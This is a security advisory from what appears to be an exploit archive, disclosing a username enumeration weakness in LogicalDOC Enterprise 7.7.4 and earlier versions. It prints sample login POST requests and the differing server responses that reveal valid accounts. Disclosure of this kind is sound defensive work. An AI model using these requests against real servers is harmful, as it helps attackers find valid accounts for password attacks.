LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness

LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness: Posted Feb 12, 2018; Authored by LiquidWorm | Site zeroscience.mk; LogicalDOC Enterprise version 7.7.4 suffers from a username enumeration weakness vulnerability.; tags | exploit; SHA-256 | 3341c6779b81ffecf5473a04978fa7c12903c213c570b25e23f72268fefccb43; Download | Favorite | View

LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness


LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness


Vendor: LogicalDOC Srl
Product web page: https://www.logicaldoc.com
Affected version: 7.7.4
                  7.7.3
                  7.7.2
                  7.7.1
                  7.6.4
                  7.6.2
                  7.5.1
                  7.4.2
                  7.1.1

Summary: LogicalDOC is a free document management system that is designed
to handle and share documents within an organization. LogicalDOC is a content
repository, with Lucene indexing, Activiti workflow, and a set of automatic
import procedures.

Desc: The weakness is caused due to the 'j_spring_security_check' script
and how it verifies provided credentials. Attacker can use this weakness
to enumerate valid users on the affected node.

Tested on: Microsoft Windows 10
           Linux Ubuntu 16.04
           Java 1.8.0_161
           Apache-Coyote/1.1
           Apache Tomcat/8.5.24
           Apache Tomcat/8.5.13
           Undisclosed 8.41


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2018-5451
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5451.php


26.01.2018

--


Request/response for existent username:
---------------------------------------

POST /j_spring_security_check HTTP/1.1
Host: 192.168.1.74:8080

j_username=admin&j_password=123123&j_successurl=%2Ffrontend.jsp&j_failureurl=%2Flogin.jsp

--

HTTP/1.1 302 
Set-Cookie: ldoc-failure=wrongpassword
Location: //login.jsp?failure=wrongpassword
Content-Length: 0
Date: Tue, 06 Feb 2084 19:42:15 GMT
Connection: close


Request/response for non-existent username:
-------------------------------------------

POST /j_spring_security_check HTTP/1.1
Host: 192.168.1.74:8080

j_username=n00b&j_password=123123&j_successurl=%2Ffrontend.jsp&j_failureurl=%2Flogin.jsp

--

HTTP/1.1 500 
Set-Cookie: JSESSIONID=F06F1D03E249D90802AFE92428DBBEDD; Path=/; Secure; HttpOnly
Content-Type: text/html;charset=UTF-8
Content-Length: 78
Date: Tue, 06 Feb 2084 19:57:14 GMT
Connection: close

<html>
<body>
  <div><br/><br/><strong>ERROR</strong></div>
</body>
<html>

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness

LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness

Share This

LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems